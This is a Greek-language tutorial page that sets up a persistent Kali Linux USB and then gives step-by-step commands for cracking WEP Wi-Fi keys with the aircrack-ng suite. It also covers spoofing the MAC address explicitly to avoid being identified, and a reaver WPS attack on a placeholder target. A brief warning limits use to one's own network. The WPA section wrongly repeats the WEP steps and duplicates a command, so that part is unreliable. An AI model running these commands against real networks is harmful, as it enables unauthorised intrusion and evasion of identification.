Ασφάλεια Υπολογιστών


Penetration Testing ονομάζουμε τις όποιες προσπάθειες εντοπισμού αδυναμιών (κενών ασφαλείας) σε ένα πληροφοριακό σύστημα.

Τι θα χρειαστείτε;

Έναν υπολογιστή με λειτουργικό σύστημα Kali Linux και κάρτα δικτύου που μπορεί να μπει σε κατάσταση monitor mode. Εδώ έχετε 4 επιλογές:

  • ο υπολογιστής σας να έχει εγκατεστημένο μόνο το Kali
  • ο υπολογιστής σας να έχει εγκατεστημένο το Kali μαζί με άλλο λειτουργικό σύστημα (π.χ. windows)
  • να δημιουργήσετε ένα live DVD
  • να δημιουργήσετε ένα live USB stick (δημοφιλέστερη επιλογή)

Η τελευταία επιλογή μας παρέχει περισσότερη ασφάλεια και ευελιξία γιαυτό και θα παρουσιάσουμε τα βήματα αναλυτικά :

  • Αρχικά κατεβάστε την κατάλληλη για τον υπολογιστή σας έκδοση (32 ή 64) του Kali. Το αρχείο είναι σε μορφή iso.
  • Εγκαταστήστε το πρόγραμμα WIN32 Disk Imager με το οποίο θα περάσετε το αρχείο iso σε ένα άδειο USB stick χωρητικότητας τουλάχιστον 8 GB.
  • Ξεκινήστε τον υπολογιστή σας φροντίζοντας να κάνει εκκίνηση (boot) από το USB stick.
  • Ανοίξτε ένα παράθυρο Τερματικού (λέγεται και Κονσόλα) κάνοντας κλικ στο αντίστοιχο κουμπί που φαίνεται στην εικόνα και πληκτρολογήστε gparted.
  • Στο νέο παράθυρο που θα ανοίξει επιλέξτε πάνω δεξιά το usb stick σας (sdb). Στο κουτί unallocated κάντε δεξί κλικ και επιλέξτε new. Το File System πρέπει να γίνει ext4, στο label να γράψετε persistence και να πατήστε Add. Κάντε κλικ στο πράσινο σύμβολο ().
  • Κλείστε το παράθυρο του gparted.
  • Στο παράθυρο του τερματικού γράψτε τις παρακατω εντολες πατωντας ENTER στο τελος καθε μιας.
  • mkdir    /mnt/usb
  • mount    /dev/sdb2     /mnt/usb
  • echo «/ union» > /mnt/usb/persistence.conf
  • umount /dev/sdb2
  • exit
  • Κάντε επανεκκίνηση  φροντίζοντας να κάνει εκκίνηση (boot) από το USB stick.
  • Από το Boot menu που εμφανίζεται όταν ξεκινά το Kali επιλέξτε Live USB Persistence.

Προσοχη: Το USB stick έχει τώρα την δυνατότητα να αποθηκεύει και ότι αλλαγές η προσθήκες κάνετε στο Kali (Persistence ή Non Amnesic).

kali-linux-screenshot

 

 

 

 

 

 

Για την δεύτερη περίπτωση θα χρειαστείτε ένα κατάλληλο πρόγραμμα όπως π.χ. το WIN32 Disk Imager). Λεπτομέρειες εδώ.

 

Γιατί δεν είναι καλή ιδέα να χρησιμοποιείται κρυπτογράφηση WEP στο ασύρματο router (access point) σας;

Διότι μπορεί αρκετά εύκολα να παραβιαστεί! Δείτε πως μπορείτε εσείς οι ίδιοι να “σπάσετε” τους κωδικούς στο δικό σας ασύρματο δίκτυο (μην το δοκιμάσετε σε ξένα δίκτυα διότι είναι ανήθικο και παράνομο).

  • Ανοίξτε ένα παράθυρο Τερματικού (Κονσόλα).
  • πληκτρολόγησε την εντολή: airmon-ng   start   wlan0
  • πληκτρολόγησε την εντολή: airodump-ng  mon0 για να δείτε πληροφορίες για όλα τα ασύρματα δίκτυα κοντά σας. Βεβαιωθείτε ότι το δίκτυο που θέλετε να παραβιάσετε χρησιμοποιεί κρυπτογράφηση WEP και σημειωστε το ονομα του, το καναλι και το bssid.
  • πληκτρολόγησε την εντολή: airodump-ng -c  [αριθμός καναλιού – χωρίς αγκύλες]   -w  [όνομα αρχείου όπου θα αποθηκεύονται δεδομένα π.χ dedomena]  –bssid  [το bssid του ρούτερ σας]  mon0
  • Ανοίξτε ένα δεύτερο παράθυρο Τερματικού και πληκτρολογήστε: aireplay-ng  -1  0  -a   [bssid]   mon0
  • πληκτρολόγησε την εντολή:  aireplay-ng  -3  -b   [bssid]   mon0
  • πληκτρολόγησε την εντολή: aireplay-ng -3 -b bssid mon0
  • Ανοίξτε ένα τρίτο παράθυρο Τερματικού και πληκτρολογήστε: aircrack-ng   dedomena-01.cap

Λεπτομέρειες εδώ: #1#2#3#4

 

Γιατί δεν είναι καλή ιδέα να ενεργοποιήσω το MAC Address Filtering στο ασύρματο router (access point) σας;

Διότι και αυτό μπορεί να παραβιαστεί! Περισσότερα εδώ.

 

Είμαστε 100% ασφαλής εάν χρησιμοποιούμε κρυπτογράφηση WPA ή WPA2 στο ασύρματο router (access point) μας;

Υπό προϋποθέσεις το router μπορεί να παραβιαστεί. Δείτε πως:

Αρχικά μπορείτε να αλλάξετε την MAC address της κάρτας δικτύου σας για να μην σας αναγνωρίσουν.

  • Ανοίξτε ένα παράθυρο Τερματικού (Κονσόλα).
  • πληκτρολόγησε τις εντολές: ifconfig wlan0 down    ()
    macchanger -m 00:11:22:33:44:55 wlan0
    ifconfig wlan0 up
  • πληκτρολόγησε την εντολή: airodump-ng  mon0 για να δείτε πληροφορίες για όλα τα ασύρματα δίκτυα κοντά σας. Βεβαιωθείτε ότι το δίκτυο που θέλετε να παραβιάσετε χρησιμοποιεί κρυπτογράφηση WEP και σημειωστε το ονομα του, το καναλι και το bssid.
  • πληκτρολόγησε την εντολή: airodump-ng -c  [αριθμός καναλιού – χωρίς αγκύλες]   -w  [όνομα αρχείου όπου θα αποθηκεύονται δεδομένα π.χ dedomena]  –bssid  [το bssid του ρούτερ σας]  mon0
  • Ανοίξτε ένα δεύτερο παράθυρο Τερματικού και πληκτρολογήστε: aireplay-ng  -1  0  -a   [bssid]   mon0
  • πληκτρολόγησε την εντολή:  aireplay-ng  -3  -b   [bssid]   mon0
  • πληκτρολόγησε την εντολή: aireplay-ng -3 -b bssid mon0
  • Ανοίξτε ένα τρίτο παράθυρο Τερματικού και πληκτρολογήστε: aircrack-ng   dedomena-01.cap

 

airmon-ng start wlan0
kill processes that may interfere –Use this step only if you have issues
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
airodump-ng mon0
reaver -i mon0 -b TA:RG:ET:NE:TW:RK -vv –dh-small

Λεπτομέρειες εδώ: #1, #2, #3, #4

 

Περισσότερα σε λίγο καιρό …